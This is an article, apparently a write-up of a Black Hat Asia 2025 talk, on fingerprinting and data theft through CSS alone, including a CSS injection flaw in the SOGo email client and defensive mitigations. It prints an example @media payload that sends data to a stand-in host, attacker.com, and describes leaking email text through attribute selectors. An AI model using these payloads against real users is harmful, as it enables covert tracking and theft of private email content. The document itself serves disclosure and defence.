Bypassing JavaScript Protections: Fingerprinting and Data Exfiltration via CSS

TLDR: Modern browser and email client security often relies on disabling JavaScript to prevent tracking, but this talk proves that CSS features like media queries and math functions are sufficient for sophisticated fingerprinting and data exfiltration. Researchers demonstrated how these techniques can identify hardware, OS, and user preferences, and even exfiltrate data from email clients via a novel CSS injection vulnerability. Security professionals must treat CSS as a viable attack vector for information leakage and prioritize sanitizing HTML content in email clients to mitigate these risks.

Most security professionals treat CSS as a benign styling language, focusing their defensive efforts on JavaScript-based threats. This assumption is dangerous. The research presented at Black Hat Asia 2025 by Leon Trampert and Daniel Weber exposes how CSS has evolved into a powerful, Turing-complete-adjacent tool for tracking and data exfiltration. By leveraging features like media queries, container queries, and complex math functions, an attacker can build a unique browser fingerprint without executing a single line of JavaScript.

The Mechanics of CSS Fingerprinting

Browser fingerprinting is usually associated with JavaScript APIs like Canvas or WebGL. However, CSS provides a stealthier alternative that bypasses "NoScript" or similar browser-level protections. The core mechanism relies on the browser's need to render content differently based on the user's environment.

Media queries are the most straightforward example. An attacker can inject a series of @media rules that trigger external requests based on specific conditions. For instance, by checking for (min-width: 720px) or (prefers-color-scheme: dark), the browser will attempt to load a background image from an attacker-controlled server only if the condition is met. The server logs the incoming request, effectively confirming the user's screen resolution or system theme.

The research goes further by utilizing CSS math functions like calc() and sin(). These functions allow for arithmetic operations that produce different results based on the underlying hardware architecture or floating-point implementation. By crafting a payload that performs a specific calculation and uses the result in a URL, an attacker can force the browser to leak information about the CPU or OS.

/* Example of a payload that leaks information via background image requests */
@media (min-width: 720px) {
  .fingerprint {
    background-image: url('https://attacker.com/log?width=720');
  }
}

From Fingerprinting to Data Exfiltration

While fingerprinting is a privacy concern, the researchers also uncovered a more critical vulnerability in email clients: CSS injection. Many email clients, including those used by major providers, fail to properly sanitize HTML/CSS, allowing attackers to inject arbitrary styles.

The researchers discovered that by injecting an @import rule, they could force an email client to load an external stylesheet. This technique, assigned CVE-2024-24510, allows an attacker to manipulate the DOM of the email client. In the case of SOGo, this vulnerability enabled the exfiltration of sensitive data from the email body. By iteratively testing characters against the [value^="a"] attribute selector, the attacker can reconstruct the content of a subject line or email body character by character.

This is a classic side-channel attack. The email client acts as an oracle, confirming whether a guess about the data is correct based on whether the CSS rule applies and triggers a network request. For a pentester, this means that even if you cannot execute JavaScript, you can still exfiltrate data if you can influence the CSS of a rendered page or email.

Real-World Implications for Pentesters

During a red team engagement or a bug bounty hunt, you should look for entry points where user-supplied HTML is rendered without strict sanitization. This is common in webmail interfaces, customer support ticketing systems, and even some document previewers.

When testing, do not just look for XSS. Check if you can inject CSS that triggers external requests. If you can control the CSS, you can map out the internal network or identify the user's browser version and OS, which is invaluable for tailoring subsequent attacks. The impact of these techniques is significant because they are often ignored by traditional web application firewalls (WAFs) that are tuned to look for <script> tags or onerror handlers.

Defensive Strategies

Defending against CSS-based attacks requires a shift in how we handle HTML content. The most effective mitigation is to strip all external resource loading from user-supplied HTML. This means removing url() references in CSS, blocking @import rules, and preventing the use of <iframe> tags.

For email clients, the best practice is to render HTML in a sandboxed environment that has no network access, or to convert HTML to a safe, static format like plain text or a sanitized image representation. If you are a developer, ensure your sanitization library is up to date and explicitly configured to block CSS injection vectors. You can refer to the OWASP HTML Sanitization guide for best practices on handling untrusted HTML.

The era of assuming CSS is harmless is over. As browsers and email clients continue to add complex features to support responsive design, they inadvertently expand the attack surface for privacy-invasive tracking and data theft. Start auditing your applications for these CSS-based leaks today, because the tools to exploit them are already in the hands of those who don't care about your privacy.